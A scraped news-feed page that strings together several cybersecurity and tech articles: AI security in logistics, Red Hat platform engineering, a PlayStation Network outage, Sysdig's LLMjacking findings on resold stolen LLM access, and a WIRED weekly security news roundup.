AI is also playing an important role in predicting and preventing ransomware attacks on logistics infrastructure. By analyzing behavioural data, AI-driven security platforms can identify possible cybersecurity threats before they execute, reducing the risk of supply chain-wide disruptions. With cybercrime damages **projected** to reach $10.5 trillion annually by 2025, logistics companies must integrate AI-driven security into their operations, or risk falling victim to cybercriminals.

****AI’s Role in Logistics Security and Cybercrime****

While AI is strengthening supply chain security, cybercriminals are also exploiting it to deploy **AI-powered hacking tools** to exploit vulnerabilities. One of the most concerning trends is adversarial AI attacks, where hackers could manipulate AI learning models to create errors in logistics decision-making.

These attacks may lead to mismatched shipments, delayed deliveries, and unnecessary fuel consumption, costing businesses millions. To fight these threats, logistics companies must deploy AI-driven cyber threat detection systems, ensuring that their own AI models cannot be compromised by external attacks.

****The Future of AI in Logistics: Security is Non-Negotiable****

The logistics industry is moving toward an AI-driven future, but without proper cybersecurity safeguards, AI itself can become a major risk. In the coming years, more and more supply chain platforms will be AI-driven, but these systems will need security frameworks to prevent AI manipulation and hacking. Regulations such as the **EU’s AI Act** are already enforcing strict compliance measures, requiring logistics companies to ensure AI security in automated transportation and warehouse operations.

Autonomous trucking is another area where AI security is becoming a priority. AI-driven self-driving fleets are expected to **reduce shipping costs** by 20-25%, but without proper cybersecurity protocols, they could be hacked to cause accidents, rerouted deliveries, or large-scale disruptions. Logistics leaders must now invest in AI-driven cybersecurity solutions to protect their fleets, warehouses, and digital infrastructure.

****AI in Logistics: The Difference Between Growth and Crisis****

AI is no longer just a tool for efficiency, it’s a critical component in protecting logistics companies from financial and cyber threats. Organizations that fail to secure their AI-powered logistics systems face significant risks, including multi-million-dollar cyberattacks, AI-driven fraud, and supply chain disruptions.

The companies that act now, investing in AI-powered security and fraud detection, will dominate the future of logistics. Those that don’t risk falling victim to cybercriminals who are already targeting AI-driven supply chains.

The question is no longer whether AI should be part of logistics, it’s whether companies can protect their AI systems before it’s too late.

1.  **Harnessing AI for Proactive Threat Intelligence**
2.  **Using AI in Business Security Decision-Making**
3.  **Why Many New AI Tools Aren’t Available In Europe?**
4.  **Top AI Trends of 2025 Businesses Should Be Ready For**
5.  **How Will Blockchain Technology Revolutionize Logistics?**

AI’s Role in Cutting Costs and Cybersecurity Threats in Logistics

The sheer amount of technologies today has created a massive boom in innovation, allowing organizations globally to create software in a variety of ways. While having numerous technologies to create software is advantageous, it also presents a challenge—managing the complexity of using so many tools and technologies.Platform engineering is an emerging practice to help organizations streamline their tools and infrastructure into a single cohesive point, known as an internal developer portal(IDP). The goal is to consolidate technologies, knowledge and best practices to boost overall productivi

The sheer amount of technologies today has created a massive boom in innovation, allowing organizations globally to create software in a variety of ways. While having numerous technologies to create software is advantageous, it also presents a challenge—managing the complexity of using so many tools and technologies.

Platform engineering is an emerging practice to help organizations streamline their tools and infrastructure into a single cohesive point, known as an internal developer portal(IDP). The goal is to consolidate technologies, knowledge and best practices to boost overall productivity for all teams in the IT organization.

**Key benefits of platform engineering**

Platform engineering significantly increases software production efficiency through:

*   **Curated technologies:** A standard set of tools and technologies across the organization.
*   **Self-service capabilities:** Enabling team members to access what they need when they need it.
*   **Security and trust:** Delivering solutions with built-in security features and compliance based on organizational best practices.
*   **Platform team support:** An internal team of platform engineers dedicated to maintaining and improving the platform.

By adopting platform engineering, organizations can overcome the complexity of today's technology landscape, fostering innovation while ensuring stability and scalability.

**Are organizations adopting platform engineering?**

According to feedback from attendees at the OpenShift Commons Gathering in Salt Lake City, most have already applied platform engineering practices in their organizations, as shown by the yellow portion of the chart. A smaller group, represented by green, identified themselves as subject matter experts (SMEs) in platform engineering. Meanwhile, only a small fraction, indicated by the red, pink, and blue sections, reported that they are still working on understanding and translating these practices for their organizations.

Fig: Survey results showing platform engineering knowledge and experience

**What’s the value of an internal developer portal?**

Based on our survey given at OpenShift Commons Gathering, the majority of attendees reported that the term “internal developer portal” suggested “self-service.” Perhaps this is because the self-service capabilities of an internal developer portal empowers developers to independently manage their infrastructure needs and access tools, which accelerates development processes, reduces reliance on other teams, supports adherence to regulatory requirements and internal policies and enhances overall productivity.

Fig: Survey results showing what an internal developer portal means to attendees

**The evolution of platform engineering with a self-service approach**

So, is your organization considering adopting platform engineering and, if so, where should you start?

Integrating Red Hat Advanced Cluster Management for Kubernetes, Red Hat Advanced Cluster Security for Kubernetes, and Red Hat Developer Hub supports the evolution of platform engineering by bringing the self-service approach to end users, increasing developer productivity. Self-service is key to enabling end users quickly and ensuring best practices are in place and to scale platform engineers' skills across an organization. The following diagram highlights how Red Hat Developer Hub and Red Hat OpenShift can bring together diverse use cases to resolve the problems platform engineering aims to address, such as compliance, automation and optimizing scalability and performance.

Fig: Integrations between Red Hat Developer Hub, Red Hat OpenShift, including Red Hat Advanced Cluster Management and Red Hat Advanced Cluster Security as part of Red Hat OpenShift Platform Plus

Self-service also brings application capabilities quickly from Red Hat OpenShift as an application platform for developers to accelerate the software development lifecycle. The following diagram shows the possibility of integrating different products to provide developers with the tools they need to innovate quickly with guardrails set up by an organization.

Fig: Integrations between Red Hat Developer Hub, Red Hat OpenShift, and other solutions such as Red Hat OpenShift AI

Let's take a closer look at how each of these Red Hat technologies supports this self-service approach.

**Red Hat Developer Hub**

Red Hat Developer Hub is an innovative product designed to transform the way developers interact with cloud-native applications. As platform engineering becomes an integral part of modern software development, Red Hat Developer Hub stands out as a critical tool that bridges the gap between developers and operations, enabling collaboration and efficiency.

Red Hat Developer Hub is tailored to enhance the developer experience by offering robust self-service capabilities.  It allows developers to create a new application from the ground up. With just a few clicks, Red Hat Developer Hub enables developers to generate source code, set up a continuous integration/continuous deployment (CI/CD) pipeline and deploy  applications following an organization’s SDLC. This streamlined process eliminates traditional bottlenecks and empowers developers to focus on innovation rather than infrastructure.

One standout feature of Red Hat Developer Hub is its comprehensive dashboard, often referred to as the "single pane of glass," giving developers and platform engineers a unified view of their application's lifecycle. This intuitive interface enables developers and platform engineers to monitor security aspects, performance metrics and other critical features without switching between multiple tools, providing a holistic view that not only enhances productivity but also helps maintain security and performance at the highest standards.

Platform engineering focuses on building and maintaining an internal platform that serves as a foundation for developers to build and deploy applications more effectively. Red Hat Developer Hub fits perfectly within this paradigm by providing a structured yet flexible environment for application development and deployment. It abstracts the complexities of managing underlying infrastructure while offering developers the tools they need to deliver high-quality software rapidly. By doing so, it aligns with the core principles of platform engineering, which aim to streamline workflows, enhance collaboration and accelerate delivery.

Red Hat Developer Hub is a game-changer for organizations looking to enhance their platform engineering capabilities. By enabling self-service application creation, offering a comprehensive single pane of glass UI and integrating easily into platform engineering practices, Red Hat Developer Hub empowers developers and platform engineers alike to innovate with confidence. As digital transformation continues to shape the tech landscape, tools like Red Hat Developer Hub will be pivotal in driving efficiency and success.

**Red Hat Advanced Cluster Management for Kubernetes**

What management and security challenges are keeping you up at night? For example, are you wondering:

*   Did I pick the right Cloud Native Computing Foundation (CNCF) sandbox project/tool for my platform engineering team?
*   What security gaps do I not even know about, ever since my subject matter expert (SME) took her new job?
*   Are the DIY costs over-running my budget as we invest further time and effort into making all of the cloud-native tooling work together?

While you may have a deep understanding of Red Hat's capabilities in Kubernetes with Red Hat OpenShift Container Platform, Red Hat OpenShift Platform Plus moves Kubernetes management and security capabilities to the forefront.

The key message is Red Hat, as your trusted partner, has been working in the cloud-native Kubernetes business for over a decade and has expertise across the entire stack. It's what we do everyday with market leading software and capabilities that yield a true return on investment (ROI) for you.

Red Hat Advanced Cluster Management supports from Day 1 cluster lifecycle to Day 2 operations and capacity planning, workload delivery across development, stage and production and observability features that help administrators understand underutilization and namespaces where right-sizing could occur.

**Red Hat Advanced Cluster Security for Kubernetes**

A critical component of platform engineering is providing greater security assurance at every layer, where Red Hat Advanced Cluster Security plays a pivotal role. Red Hat Advanced Cluster Security integrates efficiently into Kubernetes environments, providing robust security features such as vulnerability management, runtime threat detection and compliance coverage.

Teams need more intuitive and scalable configurations, enhanced training resources and clearer best practices. These processes are seen as vital for addressing knowledge gaps, simplifying implementation and successfully operationalizing modern security practices.

Fig: Survey results showing organizations’ maturity level in vulnerability management program

Another challenge that organizations face is  security checks often occurring too late in the development process, resulting in delays that disrupt product release timelines. Organizations recognize the need to integrate security earlier in the development pipeline to identify vulnerabilities sooner and minimize costly delays. Ensuring the integrity of builds, managing vulnerabilities in container images and enforcing security policies at every deployment stage are critical tasks that can be effectively managed within a well-designed platform.

By embedding Red Hat Advanced Cluster Security into the CI/CD workflow, organizations can significantly reduce security risks without adding friction to the development process. This integration accelerates delivery and ensures that applications remain security-hardened and compliant throughout their lifecycle, making Red Hat Advanced Cluster Security an essential part of platform engineering for modern security-focused enterprises.

Learn more about how Red Hat can help you adopt platform engineering for your organization to support the complexities of today’s technology landscape.

Next steps

*   Watch the demo: Self-service provisioning with Red Hat Developer Hub
*   Read the blog: The State of Platform Engineering in the Age of AI

How to adopt platform engineering in 2025

PlayStation Network Down: PSN is experiencing a major outage, affecting account login, online gaming, PlayStation Store, and more.…

PlayStation Network Down: PSN is experiencing a major outage, affecting account login, online gaming, PlayStation Store, and more. No fixed ETA from Sony yet.

The PlayStation Network (**PSN**) is facing a major outage, leaving gamers around the world unable to access key online features. The disruption, which began around midnight on February 8, 2025, has continued for hours, causing frustration among PlayStation users.

Sony has acknowledged the issue on its official PSN status page, but details on what’s causing the problem remain unclear.

****Widespread Service Disruptions****

According to Sony’s status page, the following services are currently affected:

**Account Management**: Players are struggling to sign in, create new accounts, or manage their existing profiles. Without access to this, many other online features remain inaccessible.

**Gaming and Social Features**: Launching games, using apps, and accessing online multiplayer features have become nearly impossible. This has disrupted popular titles like Call of Duty, Fortnite, and EA FC 24, which require PSN connectivity to function properly.

**PlayStation Video**: Users are unable to stream or download movies and TV shows through PlayStation Video.

**PlayStation Store**: Sony’s digital marketplace is down, preventing users from browsing, purchasing, downloading, or redeeming vouchers for games and content. This means players can’t access new titles or expansions.

**PlayStation Direct**: Even Sony’s official store for physical products is affected, with reports of issues when searching, browsing, and purchasing items.

Impacted services (Screenshot Sony/PSN)

****All Platforms Affected****

The outage isn’t limited to just the PlayStation 5 or PlayStation 4; it extends across all PlayStation platforms, including the PS3, PS Vita, and even web-based access. This suggests the issue is widespread rather than tied to a specific console or region.

While Sony has confirmed the outage, updates have been minimal, and there’s no clear explanation or estimated time for a fix. Gamers have taken to social media to express their frustration, with the hashtag **#PSNdown** trending as users share their experiences and demand more transparency.

******What’s Causing the Outage?******

For many, PlayStation consoles are more than gaming devices; they’re entertainment hubs for streaming, digital purchases, and social interactions. The ongoing outage is affecting users who rely on PlayStation for movies, TV shows, and online purchases, making the disruption even more frustrating.

Sony has yet to reveal the cause of the issue. Speculation online includes server failures and even possible **cyberattacks**, but without confirmation from Sony, these remain rumors.

****What’s Next?****

The outage is still ongoing, and there’s no clear timeline for when services will be fully restored. Users are encouraged to check the **PlayStation Network Service Status** page and PlayStation’s official social media channels for updates.

For now, a large part of the PlayStation experience remains offline, leaving players waiting for Sony to bring the network back online.

PlayStation Network Down; Outage Leaves Gamers Frustrated

LLMjacking attacks target DeepSeek, racking up huge cloud costs. Sysdig reveals a black market for LLM access has…

LLMjacking attacks target DeepSeek, racking up huge cloud costs. Sysdig reveals a black market for LLM access has emerged, with ORP operators providing unauthorized access to stolen accounts. Find out how attackers steal access and monetize LLM usage. 

The Sysdig Threat Research Team (TRT) has observed the rapid evolution of LLMjacking attacks since their **initial discovery** in May 2024, including the expansion to new Large Language Models (LLMs) like DeepSeek. Just days after DeepSeek-V3’s release, it was, reportedly, integrated into ORP instances, demonstrating the speed with which attackers adapt. 

****Exploitation of DeepSeek API Keys and Monetization of LLMjacking****

According to researchers, similarly, DeepSeek-R1 was incorporated into these platforms shortly after its release. Multiple ORPs have been found populated with DeepSeek API keys, indicating active exploitation of this new model. 

LLMjacking, driven by the high costs associated with cloud-based LLM usage, involves attackers compromising accounts to utilize these expensive services without paying. As per TRT’s updated findings, LLMjacking has become a well-established attack vector, with online communities actively sharing tools and techniques. 

They observed a rise in the monetization of LLMjacking where LLM access is being sold through ORPs (OpenAI Reverse Proxies) with one instance reportedly selling access for $30 per month. Operators often underestimate the costs associated with LLM usage, whereas researchers noticed that in one instance, with an uptime of just 4.5 days, nearly $50,000 in costs were generated, with Claude 3 Opus being the **most expensive**.

One of the ORP instances operated by an attacker (Via Sysdig)

****The Scale of Resource Exploitation****

The total token (LLM-generated words, character sets, or combinations of words/punctuation) usage across observed ORPs exceeded two billion, highlighting the scale of resource exploitation. The victims are legitimate account holders whose credentials have been stolen.

ORP usage remains a popular method for LLMjacking.  ORP servers, **acting as reverse proxies** for various LLMs, can be exposed through Nginx or dynamic domains like TryCloudflare, effectively masking the attacker’s source.  These proxies often contain numerous stolen API keys from different providers like OpenAI, Google AI, and Mistral AI, enabling attackers to provide LLM access to others. 

“Sysdig TRT found over a dozen proxy servers using stolen credentials across many different services, including OpenAI, AWS, and Azure. The high cost of LLMs is the reason cybercriminals (like the one in the example below) choose to steal credentials rather than pay for LLM services,” researchers noted in the **blog post**.

****Online Communities Exploiting LLMjacking****

Online communities like 4chan and Discord facilitate the sharing of LLM access through ORPs. Rentry.co is used for sharing tools and services. Researchers discovered numerous ORP proxies, some with custom domains and others using TryCloudflare tunnels, in LLM prompt logs within honeypot environments, tracing back to attacker-controlled servers.

Credential theft is a significant aspect of LLMjacking, where attackers target vulnerable services and use verification scripts to identify credentials for accessing ML services. Public repositories also provide exposed credentials. Customized ORPs, often modified for privacy and stealth, are used to access stolen accounts.

To combat LLMjacking, securing access keys and implementing strong identity management are crucial.  Best practices include avoiding hardcoding credentials, using temporary credentials, regularly rotating access keys, and monitoring for exposed credentials and suspicious account behaviour.

Hackers Monetize LLMjacking, Selling Stolen AI Access for $30 per Month

Plus: Benjamin Netanyahu gives Donald Trump a golden pager, Hewlett Packard Enterprise blames Russian government hackers for a breach, and more.

As Elon Musk and his so-called Department of Government Efficiency rampage through United States federal institutions, WIRED reported extensively this week on DOGE’s members, activity, and digital access to some of the US government's most delicate and critical software systems. One DOGE technologist, 19-year-old high school graduate Edward Coristine, established at least five different companies in the past four years—including Tesla.Sexy LLC—and briefly worked at a network monitoring company that has hired convicted hackers. Experts question whether Coristine, who has gone by the name “Big Balls” online, would pass the background check typically required for access to sensitive US government systems.

Meanwhile, DOGE’s apparent dismantling of USAID coupled with the US State Department's funding freeze have dramatically disrupted efforts to help people escape forced labor camps in Southeast Asia run by criminal scammers.

Outside of US government news, WIRED conducted an investigation into more than 300 cyberattacks in the past five years against US K–12 schools and found that victim schools sometimes withhold critical information about the scale and scope of the breaches from impacted students and parents. In slightly better news, data from the cryptocurrency tracing firm Chainalysis shows that ransomware payments fell precipitously in the second half of 2024. Experts fear, though, that the brief reprieve could be short-lived and may not be easy for defenders to sustain.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

**UK Home Secretary Orders Apple Enable Access to Encrypted iCloud Backups**

The Washington Post reported on Friday that Apple has received a secret order from the UK office of the Home Secretary mandating the company to provide a way to access any user data protected by the company’s Advanced Data Protection for iCloud. The feature, which debuted at the end of 2022, is designed with end-to-end encryption so only users themselves, not Apple, have access to their data. As a result, complying with the UK demand would require Apple to break the feature by building a backdoor into it. Sources told the Post that rather than install a backdoor, Apple is likely to withdraw support for Advanced Data Protection for iCloud in the UK. “Yet that concession would not fulfill the UK demand for backdoor access to the service in other countries, including the United States,” the Post noted.

The order was issued under the UK’s broad 2016 Investigatory Powers Act. UK law enforcement agencies, not to mention cops in the US and other countries, have championed encryption backdoors for years, and lawmakers have tried at various times to mandate backdoors. The Home Office told the Post in a statement, “We do not comment on operational matters, including for example confirming or denying the existence of any such notices.” An Apple spokesperson declined to comment to the Post.

**Israel’s Netanyahu Gave Trump a Golden Pager During Washington Meeting**

Israeli prime minister Benjamin Netanyahu gave President Donald Trump a golden pager when the two met in Washington on Tuesday. The gift references a September attack in Lebanon against the militant group Hezbollah in which booby-trapped pagers (and walkie-talkies) detonated in coordinated explosions around the country. The operation killed at least 42 people, including some civilians, and injured at least 4,000 civilians, according to Lebanese officials. The attack has been widely attributed to Israel, but the country has neither confirmed nor denied its involvement. At the meeting Trump apparently gave Netanyahu a signed photograph of the two of them, which he signed, “To Bibi, a great leader!”

**Hewlett Packard Enterprise Says Russian Government Hackers Stole Some Users’ Sensitive Data**

Hewlett Packard Enterprise has been notifying dozens of users that their personal information was stolen during a 2023 breach. The company is attributing the attack to Russian state-backed hackers. The stolen data included Social Security numbers, driver’s license information, and credit card numbers. The incident began as a system intrusion in May 2023 into HPE’s email mailboxes and Microsoft SharePoint systems. HPE publicly disclosed the incident in January 2024.

**PowerSchool Data Breach Impacted Students Outside the US, Including 16,000 in the UK**

The edtech giant PowerSchool says that at least 16,000 students in the United Kingdom had their data stolen as part of a massive December data breach that may have affected 62 million students and 9.5 million teachers, most of them in the US and Canada. Attackers used compromised credentials to infiltrate the company’s customer support portal and then access user data.

PowerSchool spokesperson Beth Keebler confirmed to TechCrunch in a statement that students at four UK schools were affected totaling “approximately 16,000 students.” It is not clear if this is the total number of UK victims. The compromised data includes students’ dates of birth, contact information, some medical data, and “other related information.”

Tag

#git